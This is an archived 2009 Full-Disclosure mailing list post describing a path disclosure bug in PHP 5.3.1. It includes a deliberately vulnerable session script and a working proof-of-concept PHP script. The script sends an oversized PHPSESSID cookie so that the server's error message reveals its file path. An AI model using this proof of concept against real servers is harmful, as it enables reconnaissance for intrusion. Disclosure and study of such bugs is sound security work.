lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 27 Dec 2009 02:48:29 -0300
From: WHK <www.kernel32@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Path disclosure in PHP 5.3.1

Make a script vulnerable:
<?php
session_start();
if($_SESSION)
  echo $_SESSION;
else
  $_SESSION = 'xx';
?>

Now look the script in you explorer and change the value of cookie 
"PHPSESSID" to 300 chars "a" and look the disclosure:
Warning: session_start() [function.session-start]: 
open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php 
on line 3

PoC:
<?php
error_reporting(0);

$payload =
'GET / HTTP/1.1
Host: 127.0.0.1
Connection: close
Cookie: PHPSESSID='.str_repeat('a', 500).';

';

if(!$handle = fsockopen('127.0.0.1', 80)){
  die('Error');
}else{
  fputs($handle, $payload);
  while(!feof($handle)){
   $retorno .= fread($handle, 1024);
  }
  echo nl2br(htmlspecialchars($retorno, ENT_QUOTES));
}
?>

if value of cookie is "aaaaaaa" then file in temp of server is 
"sess_aaaaaaa", if value of cookie is ax300 dont make file and return 
the error message.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists